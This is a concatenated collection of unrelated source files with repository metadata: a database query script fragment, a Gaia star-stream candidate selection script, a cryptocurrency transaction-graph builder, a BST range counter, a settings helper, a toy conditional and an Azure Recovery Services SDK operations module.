+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
for x in q:
if x.start_time:
print x.start_time, x.length_of_time_arry
return
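# --- Hedged usage sketch (not part of the original module) ---
# Typical invocation, assuming dictionaries.py supplies the Biomatrix credentials and
# instances.objects() can parse the given exam directory; the examID and path below
# are placeholders:
#
#   import SQL
#   SQL.run_code('12345', '/path/to/exam')   # examID and exam_loc as strings
#
# run_code() connects to Biomatrix, rejects duplicate series (by UID or accession
# number), commits the new rows, and appends the examID to Usedlist.txt.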
|
[
"admin@webdsdesign.com"
] |
admin@webdsdesign.com
|
7168d30b25a5b7bfe321011b2883072fa9d97db1
|
51a5661570dfb361984733b53441a62a62bff5e0
|
/scratch/ngc4590-ps1e/target-selection.py
|
9aebb6ee8343edbad72a2c3e5cf64c0674157644
|
[
"MIT"
] |
permissive
|
ahriley/gjoll-ngc3201
|
e4db7b4df6d9f3148e891f353c0756a99b64c52a
|
5d38e00b69c939d3425fa66696ffc5be5833c5c6
|
refs/heads/main
| 2022-11-23T13:32:25.241627
| 2020-07-23T22:19:48
| 2020-07-23T22:19:48
| 281,833,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,095
|
py
|
import numpy as np
import astropy.units as u
import astropy.coordinates as coord
import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import interp1d
import utils
# Galactocentric frame post-Gaia (defaults from astropy v4.0)
coord.galactocentric_frame_defaults.set('v4.0')
# parameters for orbit integration
timestep = -1 * u.Myr
totaltime = 500*u.Myr
# cluster coordinates
glob = coord.SkyCoord(ra=189.867*u.deg,
dec=-26.744*u.deg,
distance=10.3*u.kpc,
pm_ra_cosdec=-2.752*u.mas/u.yr,
pm_dec=1.762*u.mas/u.yr,
radial_velocity=-92.99*u.km/u.s)
monte = np.random.normal(loc=[10.3, -2.752, 1.762, -92.99],
scale=[0.4738, 0.044, 0.044, 0.22],
size=(100, 4)).T
MCglob = coord.SkyCoord(ra=glob.ra,
dec=glob.dec,
distance=monte[0]*u.kpc,
pm_ra_cosdec=monte[1]*u.mas/u.yr,
pm_dec=monte[2]*u.mas/u.yr,
radial_velocity=monte[3]*u.km/u.s)
# integrate orbits
orbit = utils.integrate_orbit(init=MCglob, total=totaltime, tstep=timestep)
orbit0 = utils.integrate_orbit(init=glob, total=totaltime, tstep=timestep)
orbit_gal = coord.SkyCoord(l=orbit0['l'], b=orbit0['b'], frame=coord.Galactic)
orbit_icrs = coord.SkyCoord(ra=orbit0['ra'],
dec=orbit0['dec'],
distance=orbit0['dist'],
pm_ra_cosdec=orbit0['pmra'],
pm_dec=orbit0['pmdec'], frame=coord.ICRS)
# interpolate orbit as a function of l
x = orbit_gal.l.value
y = np.vstack([orbit_icrs.pm_ra_cosdec.value,
orbit_icrs.pm_dec.value,
orbit_gal.b.value,
orbit_icrs.distance.value,
orbit_icrs.distance.parallax.value])
f = interp1d(x,y, fill_value=[-99,-99,-99,np.inf,-99], bounds_error=False)
# load the (large) query from Gaia
df = pd.read_csv('scratch/ngc4590-ps1e/query-stream-20mag.csv')
df = df[utils.recommended_quality_cut(df)]
sc = coord.SkyCoord(ra=df['ra'].values*u.deg,
dec=df['dec'].values*u.deg,
pm_ra_cosdec=df['pmra'].values*u.mas/u.yr,
pm_dec=df['pmdec'].values*u.mas/u.yr)
sc_gal = sc.transform_to(coord.Galactic)
utils.extinction_correct_photometry(df)
# load the Helmi+18 stars in NGC 4590 (for making CMD)
helmi = pd.read_csv('scratch/ngc4590-ps1e/NGC4590.csv')
utils.extinction_correct_photometry(helmi)
helmi['M_G'] = helmi['g0'] - glob.distance.distmod.value
# cuts based on tolerances around orbit
pmra, pmdec, b, distance, parallax = f(sc_gal.l)
sel = (np.abs(pmra * u.mas/u.yr - sc.pm_ra_cosdec).value / df['pmra_error']) < 2
sel &= (np.abs(pmdec * u.mas/u.yr - sc.pm_dec).value / df['pmdec_error']) < 2
sel &= np.abs(parallax - df['parallax'])/df['parallax_error'] < 3
sel &= np.abs(b * u.deg - sc_gal.b) < 1*u.deg
a = 480
xvar, yvar = ['ra', 'pmdec']
plt.plot(orbit[xvar][a:], orbit[yvar][a:], 'C0', alpha=0.2)
plt.plot(df[xvar][sel], df[yvar][sel], 'C1.')
plt.xlim(160,195);
plt.plot(helmi['bp_rp0'], helmi['M_G'], '.')
plt.plot(df['bp_rp0'][sel], df['M_G'][sel], '.')
plt.xlim(0,2)
plt.ylim(5,-4);
# flag if candidate falls near CMD (Dotter, Fe/H=-1.241, 11.1 Gyr)
iso = utils.isochrone()
df['M_G'] = df['g0'] - coord.Distance(distance*u.kpc).distmod.value
df['cmdflag'] = np.abs(df['bp_rp0'] - iso(df['M_G'])) < 0.1
# select stars that are kinematic candidates
cand_kinematic = df[sel].copy()
cand = cand_kinematic[cand_kinematic['g'] < 15]
cand.set_index('source_id', inplace=True)
cand_kinematic.set_index('source_id', inplace=True)
# helpful info for Terese
cand['coordstring'] = coord.SkyCoord(cand['ra'], cand['dec'], unit='deg').to_string('hmsdms')
cand['johnson_V'] = cand['g'] - (-0.01760 - 0.006860*cand['bp_rp'] - 0.1732*(cand['bp_rp']**2))
# cand.to_csv('data/gjoll-candidates/gjoll-plus-bright.csv')
# cand_kinematic.to_csv('data/gjoll-candidates/all-candidates.csv')
|
[
"30327239+ahriley@users.noreply.github.com"
] |
30327239+ahriley@users.noreply.github.com
|
9f7068ea449afc9c50905e8fa189a76f8acb94aa
|
f9d5bc590bd6c6274d7a6efec0f60cac1d8286b2
|
/assets/coins/amsterdamcoin/amsterdamcoinCreateGraphTransactions.py
|
a689e693577d2f8f8a533124a3483383e58434e2
|
[] |
no_license
|
pr0logas/grepblockBEpython
|
35c83c1bf2114fc9417bedff6cf2a6e2ad2e667e
|
bbeaa290d13d80f993d843c7f1dbbfd373eee332
|
refs/heads/master
| 2022-10-03T23:35:44.600740
| 2020-03-09T08:24:53
| 2020-03-09T08:24:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,308
|
py
|
#:: By GrepBlock.com developers // pr0logas, mrNemo
#:: Modified date: 2019-11-30
#:: Description: This file is a workspace for assetGraph creation.
import sys, time
from datetime import datetime, timedelta
from time import gmtime, strftime
from amsterdamcoin import *
sys.path.append('../../../')
from mongoDB import *
from parseGraphs import parseGraph
db = database
collectionForBlocks = "blocks"
# Init Classes;
PG = parseGraph(assetTicker, fileForTransactions, genesisBlock)
MC = mongoConnection(mongoAuth, db, collectionForBlocks)
# Find Last unixTime value in a working json file;
lU = PG.parseTransactionsFindLastValue()
if lU == 'FileWasEmpty!':
lU = PG.parseTransactionsFindLastValue()
print "Warning, file was empty, init zero params!"
# Find the same but in MongoDB;
lastBlockByUnixTime = MC.findLastBlockTime(collectionForBlocks, lU)
# Last Block value in mongoDB;
findLastBlock = MC.findLastBlock(collectionForBlocks)
# Init Global while vars;
nextDayTime = (datetime.fromtimestamp(float(lU)) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
sumTxs = 0
nextDayTimeWhileProgress = nextDayTime
whileprogress = lastBlockByUnixTime
while whileprogress <= findLastBlock:
lB = MC.findByBlock(collectionForBlocks, whileprogress)
    if lB != []: # an empty result should never happen (the else branch below treats it as fatal)
count = len(lB['tx'])
unixTime = lB['time']
reqNum = int(count)
currBlkTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
# This should never happen. But if the blockchain stopped for more than 24h?
check1 = str(currBlkTime).replace("-", "")
check2 = str(nextDayTimeWhileProgress).replace("-", "")
if int(check1) > int(check2):
print "WARNING! The blockchain STALL has been detected!!!"
printTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
resJSON = PG.appendNewContentToTxsGraph(sumTxs, unixTime)
resWrite = PG.writeJSONtoFile(resJSON)
if resWrite == 'OK':
print timeSet + " Next day found. Total Transactions: " + str(sumTxs) + " // We at " + str(printTime)
sumTxs = 0
nextDayTimeWhileProgress = (datetime.fromtimestamp(unixTime) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
else:
print "FATAL!"
sys.exit(1)
elif currBlkTime != nextDayTimeWhileProgress:
sumTxs = (reqNum + sumTxs)
else:
printTime = (datetime.fromtimestamp(unixTime)).strftime('%Y-%m-%d')
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
resJSON = PG.appendNewContentToTxsGraph(sumTxs, unixTime)
resWrite = PG.writeJSONtoFile(resJSON)
if resWrite == 'OK':
print timeSet + " Next day found. Total Transactions: " + str(sumTxs) + " // We at " + str(printTime)
sumTxs = 0
nextDayTimeWhileProgress = (datetime.fromtimestamp(unixTime) + timedelta(hours=24)).strftime('%Y-%m-%d') # Increase 1 day;
else:
print "FATAL!"
sys.exit(1)
else:
print "FATAL! Something went wrong while counting Transactions Graph!"
sys.exit(1)
whileprogress += 1
# Send new JSON to FE;
PG.sendJSONtoFronend()
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
print timeSet +" ***JSON copied to FE instance***"
timeSet = strftime("%Y-%m-%d %H:%M:%S", gmtime())
print timeSet +" All tasks were successful."
|
[
"prologas@protonmail.com"
] |
prologas@protonmail.com
|
0ef902b868c00e4a371703abd337f666f56f2c44
|
263018d629a59ff505c81d15a4b9d837a4744fdd
|
/BST/CountRange.py
|
fc6947c8f9f1640f135b6117df6eca5202997df2
|
[] |
no_license
|
soheshdoshi/Ds-Algo
|
599ba2d97e14b896946266d163c028242d5d4a2b
|
a818a67fc18b9c81fdeb999dd0c81c52c0172cc4
|
refs/heads/master
| 2021-06-01T21:14:37.857737
| 2020-06-18T20:04:01
| 2020-06-18T20:04:01
| 254,314,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 347
|
py
|
def countRange(node,B,C,count):
if node:
countRange(node.left,B,C,count)
temp=node.val
if temp>=B and temp<=C:
count[0]+=1
countRange(node.right,B,C,count)
return count
else:
return count
def mySoution(node,B,C):
count=[0]
countRange(node,B,C,count)
return count[0]
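# --- Hedged usage sketch (not part of the original file) ---
# Assuming a minimal BST node with .val/.left/.right attributes:
#
#   class Node:
#       def __init__(self, val, left=None, right=None):
#           self.val, self.left, self.right = val, left, right
#
#   root = Node(10, Node(5, Node(3), Node(8)), Node(15))
#   print(mySoution(root, 4, 12))   # -> 3, counting the values 5, 8 and 10 in [4, 12]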
|
[
"doshisohesh@gmail.com"
] |
doshisohesh@gmail.com
|
d17c1862380e18d3bd2253b3957060a6e791edab
|
8fbb6fb2090c9861c70c6ffc1c6191b53d7d0c05
|
/lib/settings/settings.py
|
6ed47d3d438bd6653fa4b11addc3b7b2c0527656
|
[] |
no_license
|
carlesm/RomTaStick
|
4992d3bebb1390ad9324d91d5004184c60a3c1af
|
db3ec6f23a8442941edbe4c7dcd71558405ea8a1
|
refs/heads/master
| 2020-05-26T16:25:33.604803
| 2018-03-03T17:45:01
| 2018-03-03T17:45:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
import ConfigParser
import os
class Settings(object):
_file_path = '/home/pi/.RomTaStick/settings.json'
_config = None
def __init__(self, file_path='/home/pi/.RomTaStick/settings.json'):
self._file_path = file_path
# Create parent dir
parent_dir = os.path.abspath(os.path.join(self._file_path, os.pardir))
if not os.path.exists(parent_dir):
os.makedirs(parent_dir)
self._config = ConfigParser.RawConfigParser(allow_no_value=True)
def write(self, section, property, value):
if not self._config.has_section(section):
self._config.add_section(section)
self._config.set(section, property, value)
with open(self._file_path, 'wb') as configfile:
self._config.write(configfile)
def read(self, section, property):
try:
self._config.read(self._file_path)
            value = self._config.get(section, property)
            if value is None:
                value = 'None'
            return value
except ConfigParser.NoSectionError:
return 'None'
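# --- Hedged usage sketch (not part of the original module); section and option names are placeholders ---
#   settings = Settings()                       # defaults to /home/pi/.RomTaStick/settings.json
#   settings.write('audio', 'volume', '80')     # creates the [audio] section on first use
#   print(settings.read('audio', 'volume'))     # -> '80'; a missing section yields 'None'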
|
[
"gi.grousset@gmail.com"
] |
gi.grousset@gmail.com
|
21e0898ae647bb0582a66d36d3ffd5919e54ca48
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/aio/operations/_resource_guard_proxy_operations.py
|
1e545be7b61f367e25f5c5cc071de4c57a7d1ada
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 22,106
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union, overload
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._resource_guard_proxy_operations import (
build_delete_request,
build_get_request,
build_put_request,
build_unlock_delete_request,
)
from .._vendor import RecoveryServicesBackupClientMixinABC
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ResourceGuardProxyOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s
:attr:`resource_guard_proxy` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, vault_name: str, resource_group_name: str, resource_guard_proxy_name: str, **kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Returns ResourceGuardProxy under vault and with the name referenced in request.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ResourceGuardProxyBaseResource] = kwargs.pop("cls", None)
request = build_get_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ResourceGuardProxyBaseResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@overload
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: _models.ResourceGuardProxyBaseResource,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters:
~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def put(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: Union[_models.ResourceGuardProxyBaseResource, IO],
**kwargs: Any
) -> _models.ResourceGuardProxyBaseResource:
"""Add or Update ResourceGuardProxy under vault
Secures vault critical operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Is either a ResourceGuardProxyBaseResource type
or a IO type. Required.
:type parameters:
~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ResourceGuardProxyBaseResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ResourceGuardProxyBaseResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.ResourceGuardProxyBaseResource] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "ResourceGuardProxyBaseResource")
request = build_put_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.put.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ResourceGuardProxyBaseResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
put.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@distributed_trace_async
async def delete( # pylint: disable=inconsistent-return-statements
self, vault_name: str, resource_group_name: str, resource_guard_proxy_name: str, **kwargs: Any
) -> None:
"""Delete ResourceGuardProxy under vault.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.delete.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}"
}
@overload
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: _models.UnlockDeleteRequest,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteRequest
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def unlock_delete(
self,
vault_name: str,
resource_group_name: str,
resource_guard_proxy_name: str,
parameters: Union[_models.UnlockDeleteRequest, IO],
**kwargs: Any
) -> _models.UnlockDeleteResponse:
"""Secures delete ResourceGuardProxy operations.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param resource_guard_proxy_name: Required.
:type resource_guard_proxy_name: str
:param parameters: Request body for operation. Is either a UnlockDeleteRequest type or a IO
type. Required.
:type parameters: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteRequest or
IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: UnlockDeleteResponse or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.UnlockDeleteResponse
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.UnlockDeleteResponse] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "UnlockDeleteRequest")
request = build_unlock_delete_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
resource_guard_proxy_name=resource_guard_proxy_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.unlock_delete.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("UnlockDeleteResponse", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unlock_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupResourceGuardProxies/{resourceGuardProxyName}/unlockDelete"
}
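# --- Hedged usage sketch (not part of the generated file) ---
# These operations are reached through the async client rather than by instantiating
# ResourceGuardProxyOperations directly; assuming the usual mgmt-client constructor
# (credential, subscription_id), a call might look like:
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.recoveryservicesbackup.activestamp.aio import RecoveryServicesBackupClient
#
#   async def show_proxy():
#       async with RecoveryServicesBackupClient(DefaultAzureCredential(), "<subscription-id>") as client:
#           proxy = await client.resource_guard_proxy.get(
#               vault_name="<vault>",
#               resource_group_name="<resource-group>",
#               resource_guard_proxy_name="<proxy-name>",
#           )
#           print(proxy.name)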
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
d6965f82ab816e989349999bde7d4957807710c9
|
d5ae279229727da8414006848806304a0a215c05
|
/condition4.py
|
9bda43e978e4e87bf2a60d3e18b2631debf6191d
|
[] |
no_license
|
biroa/edx_python
|
9c425da0c770155bfb0ff1efa4cc8c9cbe1bcd93
|
0b6c70364f282ea6a40b0e83ff85ed45db02b761
|
refs/heads/master
| 2021-01-01T05:16:39.873028
| 2016-05-08T12:38:44
| 2016-05-08T12:38:44
| 58,311,100
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 78
|
py
|
if 6/2:
print('three')
elif 5:
print('five')
else:
print('zero')
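# Note: 6/2 evaluates to a truthy value (3.0 under Python 3), so 'three' is printed
# and the elif/else branches never run.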
|
[
"adam.biro@gmail.com"
] |
adam.biro@gmail.com
|
da362ac93063d909cd1b9c6aaa965f0e388c36c7
|
d8ce4b82a490fd466e4e557ba1930513bf63ce69
|
/00_raw_data_processing/data_processing_pipeline/02_create_combined_study_table.py
|
